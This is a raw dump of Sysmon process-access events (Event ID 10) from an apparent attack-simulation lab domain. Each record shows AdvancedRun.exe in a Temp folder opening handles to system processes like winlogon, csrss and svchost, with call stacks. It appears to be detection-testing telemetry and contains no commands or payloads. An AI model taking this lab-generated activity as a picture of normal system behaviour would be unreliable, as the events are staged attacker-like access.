10341000x80000000000000004009401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004009393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
